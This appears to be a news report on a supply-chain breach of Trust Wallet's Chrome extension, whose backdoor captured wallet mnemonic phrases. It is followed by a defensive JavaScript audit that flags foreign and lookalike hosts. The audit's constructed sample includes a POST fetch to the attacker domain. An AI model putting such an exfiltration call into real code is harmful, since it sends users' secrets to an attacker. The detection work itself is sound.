Approximately $8.5 million in assets was stolen in a cyber attack targeting Trust Wallet's Google Chrome extension. The company disclosed on Tuesday that the breach, linked to the second iteration of the Shai-Hulud supply chain outbreak in November 2025, allowed attackers to gain access to its internal systems.
By exploiting exposed developer secrets, the attacker secured full access to the Chrome Web Store API. This unauthorized access facilitated the upload of a compromised extension that included a backdoor designed to capture users' wallet mnemonic phrases. According to cybersecurity firm Koi, this malicious code activates during every unlock attempt, compromising sensitive information regardless of user authentication methods.
Researchers highlighted that all wallets associated with a user's account were at risk, not just the currently active one. The rogue domain "metrics-trustwallet[.]com" was linked to a hosting provider known for supporting various cybercriminal activities. The domain's response further included a reference to the Dune universe, reflecting previous incidents related to the Shai-Hulud outbreak.
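A build-audit check a defender could run over an unpacked extension before or after publication, shown here as an added example (not code from Trust Wallet or Koi): it lists every hard-coded host outside a first-party allow-list and marks those that embed the brand name, as the domain above does. `ALLOWED_SUFFIXES`, `BRAND`, and the sample file contents are constructed assumptions.

```javascript
// Assumed first-party domains for the extension under audit (illustrative).
const ALLOWED_SUFFIXES = ["trustwallet.com"];
// Brand token that should never appear in a host we do not own.
const BRAND = "trustwallet";
// Domain named in the article, stored defanged as written there.
const PAGE_IOC = "metrics-trustwallet[.]com";

const refang = (s) => s.replace(/\[\.\]/g, ".");

// Pull every http(s)/ws(s) hostname out of a source string.
function extractHosts(source) {
  const hosts = new Set();
  const re = /\b(?:https?|wss?):\/\/([a-z0-9.-]+)/gi;
  for (const m of source.matchAll(re)) {
    hosts.add(m[1].toLowerCase().replace(/\.$/, ""));
  }
  return [...hosts];
}

// Exact match or true subdomain only. The leading dot matters:
// a bare endsWith("trustwallet.com") would accept "metrics-trustwallet.com".
function isFirstParty(host) {
  return ALLOWED_SUFFIXES.some((d) => host === d || host.endsWith("." + d));
}

// files: { filename: sourceText }. Returns one finding per foreign host.
function auditBundle(files) {
  const findings = [];
  for (const [file, source] of Object.entries(files)) {
    for (const host of extractHosts(source)) {
      if (isFirstParty(host)) continue;
      const lookalike = host.replace(/[^a-z0-9]/g, "").includes(BRAND);
      findings.push({ file, host, lookalike });
    }
  }
  return findings;
}

// Constructed sample bundle; file names, paths and URLs are made up.
const SAMPLE = {
  "background.js": `fetch("https://api.trustwallet.com/v1/constructed");`,
  "unlock.js": `fetch("https://${refang(PAGE_IOC)}/constructed-path", {method: "POST"});`,
  "vendor.js": `const cdn = "https://cdn.example.org/lib.js";`,
};

console.log(auditBundle(SAMPLE));
```

Comparing the host list of each published version against the previous one surfaces a newly introduced endpoint even when no allow-list exists yet.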